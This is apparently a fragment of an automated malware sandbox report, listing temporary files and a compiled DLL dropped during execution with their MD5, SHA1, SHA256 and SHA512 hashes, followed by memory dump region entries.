| SHA512 | 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd |
\??\c:\Users\Admin\AppData\Local\Temp\xstaiujp\CSC1E2C45E74E1F4F0B976E67B55DED858.TMP
| MD5 | 220d4f9d2df838a9a5735566af7026c1 |
| SHA1 | cc5eec515df1a0170bc39e4365df1a8f0dcd5925 |
| SHA256 | de45a21e579f1cc44ccb9c75c0db15acbe2f5cbe876ca8a5e506374340ef80f0 |
| SHA512 | a9669541a473ccf87d48249bfa681a06b1df3a23a5447798a54b8231d5f01ef33d938bb821eef7d30a9230f451c762f8ea0acbe938082915b288595ccdb65784 |
C:\Users\Admin\AppData\Local\Temp\RES421A.tmp
| MD5 | 4a7e8500a99ba1aa0b03f7536e7686f8 |
| SHA1 | eed41e343fd1b0a1c046873bd0eb271775dac6b2 |
| SHA256 | 181bcbc314218d116b3e2c093e38037bafe58723cec28971d988e60f3c8a4dbf |
| SHA512 | 5476ec59773ab32a06761a86c2e9b4d3e0ecb8d92bb40a130561bf48b8068b958f0c5da0602d034dc57f6d965259d7c330aac5960bb82cfe2e6b6d50b2268ae6 |
C:\Users\Admin\AppData\Local\Temp\xstaiujp\xstaiujp.dll
| MD5 | 649ff78c94c292091ebec490f52d4f50 |
| SHA1 | e5e16d301428ba87f00bb1b568756eabf7524b2a |
| SHA256 | 20b20b942a3e6508d183b4a3035201d2c21875803889f6469538631fc5ff9f54 |
| SHA512 | 25c2cd8c720f7090bd90ac157bd9dc9bb0069f9cc0b9597db494351d792cde1ec90643b9ced39363abad281a94134f366dfc3744023bfdeac827cb0ba1991cfb |
memory/2044-48-0x0000000006870000-0x0000000006878000-memory.dmp
memory/2044-50-0x00000000074B0000-0x00000000074B1000-memory.dmp
memory/2044-51-0x00000000074B0000-0x00000000074B1000-memory.dmp
memory/2028-52-0x00007FFEB5DC0000-0x00007FFEB6881000-memory.dmp
memory/2560-53-0x000001D2FE350000-0x000001D2FE360000-memory.dmp
memory/2560-54-0x000001D2FE350000-0x000001D2FE360000-memory.dmp
memory/2560-55-0x00007FFEB5DC0000-0x00007FFEB6881000-memory.dmp
memory/2044-57-0x00000000744D0000-0x0000000074C80000-memory.dmp
memory/2044-58-0x0000000004CE0000-0x0000000004CF0000-memory.dmp